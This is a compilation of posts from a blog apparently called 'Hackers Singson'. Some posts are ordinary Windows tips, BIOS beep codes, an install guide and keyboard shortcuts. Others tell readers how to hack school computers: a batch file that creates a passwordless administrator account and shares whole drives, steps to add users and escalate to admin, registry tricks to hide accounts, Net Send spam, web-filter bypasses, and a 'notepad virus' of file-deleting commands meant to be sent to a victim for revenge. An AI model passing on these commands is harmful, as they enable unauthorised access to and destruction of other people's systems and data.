Okay, here's how to send crazy messages to everyone in your school on a computer. In your command prompt, type
Net Send * "The server is h4x0r3d"
*Note: may not be necessary, depending on how many your school has access too. If it's just one, you can leave it out*
Where is, replace it with the domain name of your school. For instance, when you log on to the network, you should have a choice of where to log on, either to your school, or to just the local machine. It tends to be called the same as your school, or something like it. So, at my school, I use
Net Send Varndean * "The server is h4x0r3d"
The asterisk denotes wildcard sending, or sending to every computer in the domain. You can swap this for people's accounts, for example
NetSend Ronnel Singson,jimmy,admin "The server is h4x0r3d"
use commas to divide the names and NO SPACES between them.
Please leave your comment here regarding this post thanks
Sending messages out over the network
Posted by Hackers Singson at 10:32 PM 50 comments
Create an invisible account in Windows Xp
To hide an account on a computer,
Go to the registry key:
HKLM\Software\Microsoft\W indowsNT\CurrentVersion\W inlogon\SpecialAccounts\U serList
Create a new DWORD, setting its name to the name of the account you wish to hide. Then set its value to 0 to hide it. However, this account isn't completely hidden because it is visible to administrators in Local User and Groups and also the profile is visible in the Documents and Settings. When you are at the welcome screen, and you want to login to this account, then press Ctrl+Alt+Delete twice and it will display the log-on promt style similar to Windows 2000, then type the username, and the password and hit enter.
Please leave your comment here Thanks.
Posted by Hackers Singson at 10:31 PM 0 comments
How to recover MOST of scratched CD data discs
How to recover MOST of scratched CD data discs
I learn an old thecnique to how to recover damaged or scratched disks
with some lost of data. In this case i have one borrowed game - MAX PAYNE 2
with a chunck of 4 mb lost with a scratch in CD1 Install. Here we cover some
special thecniques of how to create a full working CD from the scratched one.
First some tools will be needed:
1. Alcohol 120%
2. UltraISO
3. Windows XP/2000 (not tested on 95/98/me)
3. Small piece of cotton
4. Dry cleaner paper
5. Finally, oil for cooking.
First step - preparing the CD
Get the cotton and drop some water, start cleaning vertically the surface of CD.
Do it 3 times and dry the water with a piece of dry cleaner paper. With a new piece
of cotton, drop some oil for cooking and start to wet the surface like you are
washing the CD with the oil. Dry carefully now. Some particles of oil will stay on the
microsurface of the scrath. It's okay. Seems the oil helps the laser of the CD/DVD driver
to read the surface again. Sure this will work with small unreadable scratchs - some hard
scratchs loose parts of the surface of the CD where we have data and it's lost forever.
But if it is loosed try anyway. Whith this tip 80% of the small scratched CD's coud be
Second Step - testing the CD
With Alcohol 120% make an ISO - image making wizard - and lets see if the app can
read the loosed surface. In my case Alcohol 120% had recovered 60% of the data.
This is not enough. Have tryed other appz, they do not recover all the data. But the
CD/DVD driver laser CAN recover all data in this case. the data is still there, what we do?
third step - making the new CD
With the main copy system of windows explorer you can do it. Just create one folder
with the same name of the CD label for future burn reference, and copy the CD content
to the folder. When the CD copy process find the scratch, in majority of the cases, it's
slow down the reading and will recover ALL loosed data.If not, it just tell you there's
an unreadable sector. In this case your CD is lost. But it's not my case, finally
windows explorer got all the data from the scratch and made a copy in the folder.
with the ultraISO, wrote the original CD label, drop the content of the folder and
save as Iso. You can Test the new CD just mounting the iso in the Alcohol 120%. In my
case i did ISO of the two discs from MAX PAYNE 2 and tested installing from the mounted
ISO. Works like a charm. I got the 4 mb lost again. So, I have burned the CD and now i
have a working copy from the scratched one.
Sounds too bizzarre, but works. Course you can jump the cleaning process and try to copy
the content with Windows explorer. But in my case did not work without oil...
Please leave your comment here regarding this post thanks
Posted by Hackers Singson at 10:30 PM 0 comments
How can I hack a school computer?
Make a .bat file with this data:
net user neo /add
net localgroup administrators neo /add
net share system=C:* /unlimited
net share system=D:* /unlimited
net share system=E:* /unlimited
Then run it and you will create a new system administrator called neo.
There would be no password.
If you want you can add a password later in Control Panel or in cmd.Like this:
net user neo *
Then you can type a new password and then reenter it.
The password would be changed.
Also you can change the username. It don't need to be neo. It can be anything else.
Just replace the neo when you are creating the new account.
Posted by Hackers Singson at 10:29 PM 0 comments
Hacking your school?
Here is information on the subject for refrence. I am not responsible for your
Open up Command Prompt (Start>Run>Command.com)
Can't use command prompt at your school?
Open up Microsoft word..Type:
Then save it as Somthing.bat.
Warning: Make sure you delete the file because if the admin finds out your in big trouble.
--Adding a user to your network--
Net user Haxxor /ADD
That will add "Haxxor" onto the school user system.
Now you added users lets delete them!
Type: Net user Haxxor /DELETE
Warning: Be carefull it deletes all their files.
"Haxxor" will be deleted from the user system.
Hmmm? It says access denied?
Thats because your not admin!
Now lets make your Admin!
This will make Haxxor an admin. Remember that some schools may not call their admins 'adminstrator' and so you need to find out the name of the local group they belong to.
Type: net localgroup
It will show you what they call admin, say at my school they calll it
adminstrator so then i would
Type: net localgroup administrator Haxxor /ADD
Getting past your web filter.
Easy way: Type whatever you want to go on say i wanted to go on miniclips bug on wire i would go to google and search miniclip bug on wire
then instead of clicking the link i would click "cached".
Hard way: I'm hoping you still have command prompt open.
Type: ping miniclip.com
And then you should get a IP type that out in your web browser, and don't forget to put "http://" before you type the IP.
Sending messages throught your school server
Okay, here's how to send crazy messages to everyone in your school on a computer. In your command prompt, type
Net Send * "The server is h4x0r3d"
Note: may not be necessary, depending on how many your school has access too. If it's just one, you can leave it out.
Where is, replace it with the domain name of your school. For instance, when you log on to the network, you should have a choice of where to log on, either to your school, or to just the local machine. It tends to be called the same as your school, or something like it. So, at my school, I use
Net Send Haxxor School * "The server is h4x0r3d"
The asterisk denotes wildcard sending, or sending to every computer in the domain. You can swap this for people's accounts, for example
NetSend Varndean dan,jimmy,admin "The server is h4x0r3d"
use commas to divide the names and NO SPACES between them.
Please leave your comment here
Posted by Hackers Singson at 10:27 PM 0 comments
Make your Folders Private
•Open My Computer
•Double-click the drive where Windows is installed (usually drive (C:), unless you have more than one drive on your computer).
•If the contents of the drive are hidden, under System Tasks, click Show the contents of this drive.
•Double-click the Documents and Settings folder.
•Double-click your user folder.
•Right-click any folder in your user profile, and then click Properties.
•On the Sharing tab, select the Make this folder private so that only I have access to it check box.
•To open My Computer, click Start, and then click My Computer.
•This option is only available for folders included in your user profile. Folders in your user profile include My Documents and its subfolders, Desktop, Start Menu, Cookies, and Favorites. If you do not make these folders private, they are available to everyone who uses your computer.
•When you make a folder private, all of its subfolders are private as well. For example, when you make My Documents private, you also make My Music and My Pictures private. When you share a folder, you also share all of its subfolders unless you make them private.
•You cannot make your folders private if your drive is not formatted as NTFS For information about converting your drive to NTFS
Please leave your comment here thanks from hackerssingson.blogspot.com
Posted by Ronnel Singson at 3:11 AM
Posted by Hackers Singson at 10:25 PM 0 comments
Boot Error Beep Codes
The following are AMI BIOS Beep Codes that can occur. However because of the wide variety of different computer manufacturers with this BIOS the beep codes may vary.
Beep Code | Descriptions |
1 short | DRAM refresh failure |
2 short | Parity circuit failure |
3 short | Base 64K RAM failure |
4 short | System timer failure |
5 short | Process failure |
6 short | Keyboard controller Gate A20 error |
7 short | Virtual mode exception error |
8 short | Display memory Read/Write test failure |
9 short | ROM BIOS checksum failure |
10 short | CMOS shutdown Read/Write error |
11 short | Cache Memory error |
1 long, 3 short | Conventional/Extended memory failure |
1 long, 8 short | Display/Retrace test failed |
The following are Award BIOS Beep Codes that can occur. However because of the wide variety of different computer manufacturers with this BIOS the beep codes may vary.
Beep Code | Description |
1 long, 2 short | Indicates a video error has occurred and the BIOS cannot initialize the video screen to display any additional information |
Any other beep(s) | RAM problem. |
If any other correctable hardware issues the BIOS will display a message.
The following are IBM BIOS Beep Codes that can occur. However because of the wide variety of models shipping with this BIOS the beep codes may vary.
Beep Code | Description |
No Beeps | No Power, Loose Card, or Short. |
1 Short Beep | Normal POST, computer is ok. |
2 Short Beep | POST error, review screen for error code. |
Continuous Beep | No Power, Loose Card, or Short. |
Repeating Short Beep | No Power, Loose Card, or Short. |
One Long and one Short Beep | Motherboard issue. |
One Long and Two short Beeps | Video (Mono/CGA Display Circuitry) issue. |
One Long and Three Short Beeps. | Video (EGA) Display Circuitry. |
Three Long Beeps | Keyboard / Keyboard card error. |
One Beep, Blank or Incorrect Display | Video Display Circuitry. |
Error Tone. (two sets of different tones) | Problem with logic board or SCSI bus. |
Startup tone, drive spins, no video | Problem with video controller. |
Powers on, no tone. | Logic board problem. |
High Tone, four higher tones. | Problem with SIMM. |
The following is for PHOENIX BIOS Q3.07 OR 4.X
Beep Code | Description / What to Check |
1-1-1-3 | Verify Real Mode. |
1-1-2-1 | Get CPU type. |
1-1-2-3 | Initialize system hardware. |
1-1-3-1 | Initialize chipset registers with initial POST values. |
1-1-3-2 | Set in POST flag. |
1-1-3-3 | Initialize CPU registers. |
1-1-4-1 | Initialize cache to initial POST values. |
1-1-4-3 | Initialize I/O. |
1-2-1-1 | Initialize Power Management. |
1-2-1-2 | Load alternate registers with initial POST values. |
1-2-1-3 | Jump to UserPatch0. |
1-2-2-1 | Initialize keyboard controller. |
1-2-2-3 | BIOS ROM checksum. |
1-2-3-1 | 8254 timer initialization. |
1-2-3-3 | 8237 DMA controller initialization. |
1-2-4-1 | Reset Programmable Interrupt Controller. |
1-3-1-1 | Test DRAM refresh. |
1-3-1-3 | Test 8742 Keyboard Controller. |
1-3-2-1 | Set ES segment to register to 4 GB. |
1-3-3-1 | 28 Autosize DRAM. |
1-3-3-3 | Clear 512K base RAM. |
1-3-4-1 | Test 512 base address lines. |
1-3-4-3 | Test 512K base memory. |
1-4-1-3 | Test CPU bus-clock frequency. |
1-4-2-4 | Reinitialize the chipset. |
1-4-3-1 | Shadow system BIOS ROM. |
1-4-3-2 | Reinitialize the cache. |
1-4-3-3 | Autosize cache. |
1-4-4-1 | Configure advanced chipset registers. |
1-4-4-2 | Load alternate registers with CMOS values. |
2-1-1-1 | Set Initial CPU speed. |
2-1-1-3 | Initialize interrupt vectors. |
2-1-2-1 | Initialize BIOS interrupts. |
2-1-2-3 | Check ROM copyright notice. |
2-1-2-4 | Initialize manager for PCI Options ROMs. |
2-1-3-1 | Check video configuration against CMOS. |
2-1-3-2 | Initialize PCI bus and devices. |
2-1-3-3 | Initialize all video adapters in system. |
2-1-4-1 | Shadow video BIOS ROM. |
2-1-4-3 | Display copyright notice. |
2-2-1-1 | Display CPU type and speed. |
2-2-1-3 | Test keyboard. |
2-2-2-1 | Set key click if enabled. |
2-2-2-3 | 56 Enable keyboard. |
2-2-3-1 | Test for unexpected interrupts. |
2-2-3-3 | Display prompt "Press F2 to enter SETUP". |
2-2-4-1 | Test RAM between 512 and 640k. |
2-3-1-1 | Test expanded memory. |
2-3-1-3 | Test extended memory address lines. |
2-3-2-1 | Jump to UserPatch1. |
2-3-2-3 | Configure advanced cache registers. |
2-3-3-1 | Enable external and CPU caches. |
2-3-3-3 | Display external cache size. |
2-3-4-1 | Display shadow message. |
2-3-4-3 | Display non-disposable segments. |
2-4-1-1 | Display error messages. |
2-4-1-3 | Check for configuration errors. |
2-4-2-1 | Test real-time clock. |
2-4-2-3 | Check for keyboard errors |
2-4-4-1 | Set up hardware interrupts vectors. |
2-4-4-3 | Test coprocessor if present. |
3-1-1-1 | Disable onboard I/O ports. |
3-1-1-3 | Detect and install external RS232 ports. |
3-1-2-1 | Detect and install external parallel ports. |
3-1-2-3 | Re-initialize onboard I/O ports. |
3-1-3-1 | Initialize BIOS Data Area. |
3-1-3-3 | Initialize Extended BIOS Data Area. |
3-1-4-1 | Initialize floppy controller. |
3-2-1-1 | Initialize hard-disk controller. |
3-2-1-2 | Initialize local-bus hard-disk controller. |
3-2-1-3 | Jump to UserPatch2. |
3-2-2-1 | Disable A20 address line. |
3-2-2-3 | Clear huge ES segment register. |
3-2-3-1 | Search for option ROMs. |
3-2-3-3 | Shadow option ROMs. |
3-2-4-1 | Set up Power Management. |
3-2-4-3 | Enable hardware interrupts. |
3-3-1-1 | Set time of day. |
3-3-1-3 | Check key lock. |
3-3-3-1 | Erase F2 prompt. |
3-3-3-3 | Scan for F2 key stroke. |
3-3-4-1 | Enter SETUP. |
3-3-4-3 | Clear in-POST flag. |
3-4-1-1 | Check for errors |
3-4-1-3 | POST done--prepare to boot operating system. |
3-4-2-1 | One beep. |
3-4-2-3 | Check password (optional). |
3-4-3-1 | Clear global descriptor table. |
3-4-4-1 | Clear parity checkers. |
3-4-4-3 | Clear screen (optional). |
3-4-4-4 | Check virus and backup reminders. |
4-1-1-1 | Try to boot with INT 19. |
4-2-1-1 | Interrupt handler error. |
4-2-1-3 | Unknown interrupt error. |
4-2-2-1 | Pending interrupt error. |
4-2-2-3 | Initialize option ROM error. |
4-2-3-1 | Shutdown error. |
4-2-3-3 | Extended Block Move. |
4-2-4-1 | Shutdown 10 error. |
4-3-1-3 | Initialize the chipset. |
4-3-1-4 | Initialize refresh counter. |
4-3-2-1 | Check for Forced Flash. |
4-3-2-2 | Check HW status of ROM. |
4-3-2-3 | BIOS ROM is OK. |
4-3-2-4 | Do a complete RAM test. |
4-3-3-1 | Do OEM initialization. |
4-3-3-2 | Initialize interrupt controller. |
4-3-3-3 | Read in bootstrap code. |
4-3-3-4 | Initialize all vectors. |
4-3-4-1 | Boot the Flash program. |
4-3-4-2 | Initialize the boot device. |
4-3-4-3 | Boot code was read OK. |
Posted by Hackers Singson at 6:38 PM 0 comments
How To Restrict Login Hours Allowed
To restrict a users logon hours , use the net user command. These commands are used from the Command Prompt. (Start - RUN - and type cmd)
Below are some examples:
1 - net user Joanna /time:M-F,08:00-17:00
2 - net user Ninja /time:M-F,8am-5pm
3 - net user Echelon /time:M,4am-5pm;T,1pm-3pm;W-F,8:00-17:00
4 - net user Shine /time:all (this one means this user can always log on)
Note:You can only restrict when a user can log on to the system. On a stand alone computer, there is no way to force a user to log off when their hours expire, without a third party script or software.
Posted by Hackers Singson at 5:42 PM 0 comments
How to destroy your pc using NOTEPAD
stuff made by me and pirated_hack@hotmail.com
my knowledge abt notepad virus and company
To delete all folders/files just put this:
DEL /F /Q *
Into notpad and save it as whateveryouwant.cmd
It will delete all files on the computer even if they are read only and it will not promt you to do it. You will not think any thing has happend untill you try and do something.
If you just want to delete the WINDOWS file do this:
The only thing you need again is Notepad.
Now, to test it, create a textfile called TEST.txt in C:
Now in your notepad type "erase C:TEST.txt" (without the quotes). Then do a "Save As..." and save it as "Test.cmd".
Now run the file "Test.cmd" then open up C: and you'll see your Test.txt is gone. Now, the real work begins:
Go to Notpad and type erase C:WINDOWS (or C:LINUX if you have linux) and save it again as whateveryouwant.cmd. Now DON'T run the file or you'll lose your WINDOWS files. So, that's the virus. Now to take revenge. Send you file to your victim. Once she/he opens it. Her/his WINDOWS/LINUX files are gone. And have to install LINUX/WINDOWS again.
Simple explanation:
Go to notepad, type erase C:WINDOWS, save as whateveryouwant.cmd send to victim, once the victim opens it, the WINDOWS file will be gone and have to install WINDOWS again.
Courtsy of www.warezscene.org
Posted by Hackers Singson at 5:40 PM 0 comments
On the main screen type
*#06# for checking the IMEI (International Mobile Equipment Identity).
*#7780# reset to factory settings.
*#67705646# This will clear the LCD display
*#0000# To view software version.
*#2820# Bluetooth device address.
*#746025625# Sim clock allowed status.
*#62209526# - Display the MAC address of the WLAN adapter. This is available only in the newer devices that supports WLAN like N80
#pw+1234567890+1# Shows if sim have restrictions.
*#92702689# - takes you to a secret menu where you may find some of the information below:
1. Displays Serial Number.
2. Displays the Month and Year of Manufacture
3. Displays (if there) the date where the phone was purchased (MMYY)
4. Displays the date of the last repair - if found (0000)
5. Shows life timer of phone (time passes since last start)
*#3370# - Enhanced Full Rate Codec (EFR) activation. Increase signal strength, better signal reception. It also help if u want to use GPRS and the service is not responding or too slow. Phone battery will drain faster though.
*#3370* - (EFR) deactivation. Phone will automatically restart. Increase battery life by 30% because phone receives less signal from network.
*#4720# - Half Rate Codec activation.
*#4720* - Half Rate Codec deactivation. The phone will automatically restart
If you forgot wallet code for Nokia S60 phone, use this code reset: *#7370925538#
Note, your data in the wallet will be erased. Phone will ask you the lock code. Default lock code is: 12345
Press *#3925538# to delete the contents and code of wallet.
*#7328748263373738# resets security code.
Default security code is 12345
Unlock service provider: Insert sim, turn phone on and press vol up(arrow keys) for 3 seconds, should say pin code. Press C,then press * message should flash, press * again and 04*pin*pin*pin#
Change closed caller group (settings >security settings>user groups) to 00000 and ure phone will sound the message tone when you are near a radar speed trap. Setting it to 500 will cause your phone 2 set off security alarms at shop exits, gr8 for practical jokes! (works with some of the Nokia phones.)
Press and hold "0" on the main screen to open wap browser.
Posted by Hackers Singson at 5:30 PM 0 comments
How can I install Windows 2000 Server
As a Microsoft Windows 2000 Server support professional, one of your tasks may be to install the operating system.
Step #1: Plan your installation
When you run the Windows 2000 Server Setup program, you must provide information about how to install and configure the operating system. Thorough planning can make your installation of W2K more efficient by helping you to avoid potential problems during installation. An understanding of the configuration options will also help to ensure that you have properly configured your system.
I won't go into that part right now but here are some of the most important things you should take into consideration when planning for your Windows Server 2000 installation:
Check System Requirements
Check Hardware and Software Compatibility
Determine Disk Partitioning Options
Choose the Appropriate File System: FAT, FAT32, NTFS
Decide on a Workgroup or Domain Installation
Complete a Pre-Installation Checklist
After you made sure you can go on, start the installation process.
Step #2: Beginning the installation process
You can install Windows 2000 Server in several methods - all are valid and good, it all depends upon your needs and your limitations.
Manual installations usually come in 3 flavors:
Boot from CD - No existing partition is required.
Boot from the 4 Setup Boot Disks, then insert the CD - No existing partition is required.
Boot from an MS-DOS startup floppy, go to the command prompt, create a 4GB FAT32 partition with FDISK, reboot, format the C partition you've created, then go to the CD drive, go into the I386 folder, and run the WINNT.EXE command.
Run an already installed OS, such as Windows NT 4.0 Server. From within NT 4.0 go to the I386 folder in the W2K installation CD and run the WINNT32.EXE command.
If you want to upgrade a desktop OS such as Windows 98 into Windows 2000 Professional you can follow the same procedure as above (You cannot upgrade Windows 98 into W2K Server).
There are other non-manual installation methods, such as using an unattended file along with a uniqueness database file, using Sysprep, using RIS or even running unattended installations from within the CD itself, but we won't go into that right now.
It doesn't matter how you run the setup process, but the moment it runs - all setup methods look alike.
Step #3: The text-based portion of the Setup program
The setup process begins loading a blue-looking text screen (not GUI). In that phase you will be asked to accept the EULA and choose a partition on which to install W2K, and if that partition is new, you'll be asked to format it by using either FAT, FAT32 or NTFS.
Start the computer from the CD.
You can press F6 if you need to install additional SCSI adapters or other mass-storage devices. If you do you will be asked to supply a floppy disk with the drivers and you CANNOT browse it (or a CD for that matter). Make sure you have one handy.
Setup will load all the needed files and drivers.
Select To Setup W2K Now. If you want, and if you have a previous installation of the OS, you can try to fix it by pressing R. If not, just press ENTER.
In case your server is a new one, or it is using a new hard disk that hasn't been partitioned yet, you'll get a warning message. Read it, and if you want to continue, press C.
Read and accept the licensing agreement and press F8 if you accept it.
Select or create the partition on which you will install W2K. Depending upon your existing disk configuration choose one of the following:
If the hard disk is not yet partitioned, you can create and size the partition on which you will install Windows 2000. Press C.
If the hard disk is new and you want to create a partition that will span the entire hard disk's size - press Enter.
Other optionsL
If the hard disk is already partitioned, but has enough unpartitioned disk space, you can create an additional partition in the unpartitioned space.
If the hard disk already has a partition that is large enough, you can install Windows 2000 on that partition. If the partition has an existing operating system, you will overwrite that operating system if you accept the default installation path. However, files other than the operating system files, such as program files and data files, will not be overwritten.
If the hard disk has an existing partition, you can delete it to create more unpartitioned space for the new partition. Deleting an existing partition erases all data on that partition.
If you select a new partition during Setup, create and size only the partition on which you will install Windows 2000. After installation, use Disk Management to partition the remaining space on the hard disk.
Select a file system for the installation partition. After you create the partition on which you will install W2K, you can use Setup to select the file system with which to format the partition. W2K supports the NTFS file system in addition to the file allocation table (FAT) and FAT32 file systems. Windows Server 2003, Windows XP Professional, Windows 2000, and Windows NT are the only Microsoft operating systems that you can use to gain access to data on a local hard disk that is formatted with NTFS. If you plan to gain access to files that are on a local W2K partition with the Microsoft Windows 95 or Windows 98 operating systems, you should format the partition with a FAT or FAT32 file system. We will use NTFS.
Setup will then begin copying necessary files from the installation point (CD, local I386 or network share).
Note: If you began the installation process from an MS-DOS floppy, make sure you have and run SMARTDRV from the floppy, otherwise the copying process will probably last more than an hour, perhaps even more. With SMARTDRV (or if setup was run by booting from CD) the copying will probably last a few minutes, no more than 5 max.
The computer will restart in graphical mode, and the installation will continue.
Step #4: The GUI-based portion of the Setup program
The setup process reboots and loads a GUI mode phase.
It will then begin to load device drivers based upon what it finds on your computer. You don't need to do anything at this stage.
If your computer stops responding during this phase (the progress bar is stuck almost half-way, and there is no disk activity) - shut down your computer and begin removing hardware such as PCI and ISA cards. If it works for you then later try to figure out how to make that specific piece of hardware work (it's probably not in the HCL).
Click Customize to change regional settings, if necessary.
Current System Locale - Affects how programs display dates, times, currency, and numbers. Choose the locale that matches your location, for example, French (Canada).
Current Keyboard Layout - Accommodates the special characters and symbols used in different languages. Your keyboard layout determines which characters appear when you press keys on the keyboard.
If you don't need to make any changes just press Next.
If you do need to make changes press Customize and add your System Locale etc.
Note for Hebrew users: In W2K it is NOT SAFE to install Hebrew language support at this phase!!! Trust me, do it later. If you don't listen to me, good chances are that you'll get ???? fonts in some Office applications such as Outlook and others.
Read the Install Hebrew on Windows 2000 page for more info.
Type your name and organization.
Type the product key.
If you'd like to skip this step in the future, please read Install Windows 2000 Without Supplying the CD Key.
Enter the appropriate license type and number of purchased licenses.
Type the computer name and a password for the local Administrator account. The local Administrator account resides in the SAM of the computer, not in Active Directory. If you will be installing in a domain, you need either a pre-assigned computer name for which a domain account has been created, or the right to create a computer account within the domain.
Choose which components to install or remove from the system.
Select the date, time, and time zone settings.
Setup will now install the networking components.
After a few seconds you will receive the Networking Settings window. BTW, if you have a NIC that is not in the HCL (see the What's the HCL? page) and W2K cannot detect it, or if you don't have a NIC at all, setup will skip this step and you will immediately go to the final phase of the setup process.
Press Next to accept the Typical settings option if you have one of the following situations:
You have a functional DHCP on your network.
You have a computer running Internet Connection Sharing (ICS).
You're in a workgroup environment and do not plan to have any other servers or Active Directory at all, and all other workgroup members are configured in the same manner.
Otherwise select Custom Settings and press Next to customize your network settings.
Highlight the TCP/IP selection and press Properties.
In the General tab enter the required information. You must specify the IP address of the computer, and if you don't know what the Subnet Mask entry should be - you can simply place your mouse pointer over the empty area in the Subnet Mask box and click it. The OS will automatically select the value it thinks is good for the IP address you provided.
Lamer note: In the above screenshot I've configured the computer with a valid IP address for MY network, along with the Default Gateway and the address of MY DNS server. Your settings may differ.
If you don't know what these values mean, or if you don't know what to write in them, press cancel and select the Typical Settings option. You can easily change these values later.
In the Workgroup or Domain window enter the name of your workgroup or domain.
A workgroup is a small group of computers on a network that enables users to work together and does not support centralized administration.
A domain is a logical grouping of computers on a network that has a central security database for storing security information. Centralized security and administration are important for computers in a domain because they enable an administrator to easily manage computers that are geographically distant from each other. A domain is administered as a unit with common rules and procedures. Each domain has a unique name, and each computer within a domain has a unique name.
If you're a stand-alone computer, or if you don't know what to enter, or if you don't have the sufficient rights to join a domain - leave the default entry selected and press Next.
If you want to join a domain (NT 4.0 domain of W2K/2003 Active Directory domain) enter the domain's name in the "Yes, make this computer a member of the following domain" box.
To successfully join a domain you need the following:
The person performing the installation must have a user account in Active Directory. This account does not need to be the domain Administrator account.
The computer must have an existing computer account in the Active Directory database of the domain that the computer is joining, and the computer must be named exactly as its domain account is named.
The person performing the installation must have appropriate permission to create a domain account for the computer during installation.
Also, you need to have connectivity to the domain's domain controllers (only to the PDC if on an NT 4.0 domain) and a fully functional DNS server (only in AD domains). Read the Joining a Domain in Windows XP Pro and Requirements when Joining a Domain pages for more on this issue.
Enter the Active Directory domain name (in the form of xxx.yyy, for example: DPETRI.NET) or the NetBIOS name of the NT 4.0 domain (in the form of xxx, for example: DPETRI). Press Next.
Note: If you provide a wrong domain name or do not have the correct connectivity to the domain's DNS server you will get an error message.
A username/password window will appear. Enter the name and password of the domain's administrator (or your own if you're the administrator on the target domain).
Note: Providing a wrong username or password will cause this phase to fail.
Next the setup process will finish copying files and configuring the setup. You do not need to do anything.
After the copying and configuring phase is finished, if Windows Server 2003 finds that you have a badly configured screen resolution it will advise you to change it and ask you if you see the new settings right.
Setup finishes and displays the finish window. Unfortunately, you must press Finish in order to reboot..
Windows 2000 reboots and you should get the CTRL-ALT-DEL window.
That's it! you're done!
Courtesy of http://www.petri.co.il/install_windows_2000.htm
Posted by Hackers Singson at 5:29 PM 0 comments
How do I install Windows 2000 after I've installed XP?
This procedure was performed on FAT32 drives but it should also work for NTFS.
Install Windows 2000
Use a Win98/Me Startup disk (with CD support) to boot your computer. If you don't have one, you can download the files to make a boot disk at www.bootdisk.com
Insert your Windows 2000 CD into the CD Rom drive.
At the A: prompt type X:\I386\WINNT.EXE where X: is your CD-ROM drive.
Proceed with the install. Install Windows 2000 to a different partition than XP is installed in.
Complete the Windows install. Allow the computer to boot into Windows 2000.
Note: You may also want to read this thorough guide on how to Install Windows 2000 Server.
Repairing the Windows XP Boot Loader
Note: Some users have reported that Step 1 is not necessary, but in testing I found that it was. Since the C: drive is FAT32, you can use a 98/Me boot disk and skip Step 1, if you wish, but you may find that you need to do it anyway.
Boot your computer with the Windows XP CD. When prompted to Setup or Repair, choose Repair. In the Recovery Console, enter the following commands.
FIXBOOT, answer Yes
CD \
In Steps 9 and 10, X is the letter of your CD-Rom drive.
Note: This tip was originally written by Doug Knox
Posted by Hackers Singson at 5:28 PM 0 comments
Hide Folder wthout any SoftwarE
Keep Folders Hidden, no software needed:
This one is really cool and pretty useful too...
Its really easy...
just follow these steps:
1.Create a new folder somewhere on your hard drive.
2.When you name it hold down "Alt" and press "0160" this will create and invisible space so it will apper as if it has no name.
3.right click it and select "Properties" select the tab "coustimize" and select "change icon" scroll along and you should a few blanc spaces click on any one and click ok and save it.
4.when you have saved the settings the folder will be invisible to hide all your personal files.
try this....i dont think that u'll find any problem doing this...if u still find any probs..just leave a comment.
Courtsy of http://crack0hack.wetpaint.com
Posted by Hackers Singson at 5:27 PM 0 comments
Changing the name of the Start Menu button
1. Run Resource Hacker, and open \windows\explorer.exe
2. Click String Table > 37 > 1033 (XP-style button)
3. Replace "start" with whatever you want ("hello", in the picture above)
4. Click the Compile Script button. Repeat steps 3 and 4 for String table > 38 > 1033 (Classic-style button)
5. Save the file (File>Save). Hit Cancel then Yes when Windows File Protection pops up.
Note: If an error message pops up when saving the file, kill explorer.exe (Clt-Alt-Del > Processes > explorer.exe > End Process > File > New Task), repeat step 5 (save the file in Resource Hacker), and restart explorer.exe (Clt-Alt-Del > Processes > explorer.exe > End Process > File > New Task > explorer > OK).
Changing the icon of the Start Menu button :
1. Click Bitmap > 143 > 1033
2. Click Action > Replace bitmap > Open file with new bitmap (the new picture must be 25x20, and have 16 million colors).
3. Select a picture file, click Replace, then save (File>Save) your work. Hit Cancel then Yes when Windows File Protection pops up.
4. Close Resource Hacker If you do not want to reboot to see your new button, kill then restart explorer.exe (Clt-Alt-Del > Processes > explorer.exe > End Process > File > New Task > explorer > OK)
Enjoy.....(Fainted brain)
Courtsy of http://crack0hack.wetpaint.com/
Posted by Hackers Singson at 5:25 PM 0 comments
multiple yahoo instances without software
Follow these steps
1. Go to Start ----> Run . Type regedit, then enter .
2.Navigate to HKEY_CURRENT_USER --------> Software --->yahoo ----->pager---->Test
3.On the right pane , right-click and choose new Dword value .
4.Rename it as Plural.
5.Double click and assign a decimal value of 1.
That's it done!!
Now close registry and restart yahoo messenger .For signing in with new id open another messenger
Courtsy of crack0hack.wetpaint.com
Posted by Hackers Singson at 5:24 PM 0 comments
All keyboard Shortcuts
1.) Windows Hotkeys
* Shift + F10 right-clicks.
* Win + L (XP Only): Locks keyboard. Similar to Lock Workstation.
* Win + F or F3: Open Find dialog. (All Files) F3 may not work in some applications which use F3 for their own find dialogs.
* Win + Control + F: Open Find dialog. (Computers)
* Win + U: Open Utility Manager.
* Win + F1: Open Windows help.
* Win + Pause: Open System Properties dialog.
* Win + Tab: Cycle through taskbar buttons. Enter clicks, AppsKey or Shift + F10 right-clicks.
* Win + Shift + Tab: Cycle through taskbar buttons in reverse.
* Alt + Tab: Display CoolSwitch. More commonly known as the AltTab dialog.
* Alt + Shift + Tab: Display CoolSwitch; go in reverse.
* Alt + Escape: Send active window to the bottom of the z-order.
* Alt + Shift + Escape: Activate the window at the bottom of the z-order.
* Alt + F4: Close active window; or, if all windows are closed, open shutdown dialog.
* Shift while a CD is loading: Bypass AutoPlay.
* Shift while login: Bypass startup folder. Only those applications will be ignored which are in the startup folder, not those started from the registry (Microsoft\Windows\CurrentVersion\Run\)
* Ctrl + Alt + Delete or Ctrl + Alt + NumpadDel (Both NumLock states): Invoke the Task Manager or NT Security dialog.
* Ctrl + Shift + Escape (2000/XP ) or (Ctrl + Alt + NumpadDot) : Invoke the task manager. On earlier OSes, acts like Ctrl + Escape.
* Printscreen: Copy screenshot of current screen to clipboard.
* Alt + Printscreen: Copy screenshot of current active window to clipboard.
* Ctrl + Alt + Down Arrow: Invert screen. Untested on OSes other than XP.
* Ctrl + Alt + Up Arrow: Undo inversion.
* Win + B : Move focus to systray icons.
2.) Generic
* Ctrl + C or Ctrl + Insert: Copy.
* Ctrl + X or Shift + Delete: Cut.
* Ctrl + V or Shift + Insert: Paste/Move.
* Ctrl + N: New... File, Tab, Entry, etc.
* Ctrl + S: Save.
* Ctrl + O: Open...
* Ctrl + P: Print.
* Ctrl + Z: Undo.
* Ctrl + A: Select all.
* Ctrl + F: Find...
* Ctrl+W : to close the current window
* Ctrl + F4: Close tab or child window.
* F1: Open help.
* F11: Toggle full screen mode.
* Alt or F10: Activate menu bar.
* Alt + Space: Display system menu. Same as clicking the icon on the titlebar.
* Escape: Remove focus from current control/menu, or close dialog box.
3.) Generic Navigation
* Tab: Forward one item.
* Shift + Tab: Backward one item.
* Ctrl + Tab: Cycle through tabs/child windows.
* Ctrl + Shift + Tab: Cycle backwards through tabs/child windows.
* Enter: If a button's selected, click it, otherwise, click default button.
* Space: Toggle items such as radio buttons or checkboxes.
* Alt + (Letter): Activate item corresponding to (Letter). (Letter) is the underlined letter on the item's name.
* Ctrl + Left: Move cursor to the beginning of previous word.
* Ctrl + Right: Move cursor to the beginning of next word.
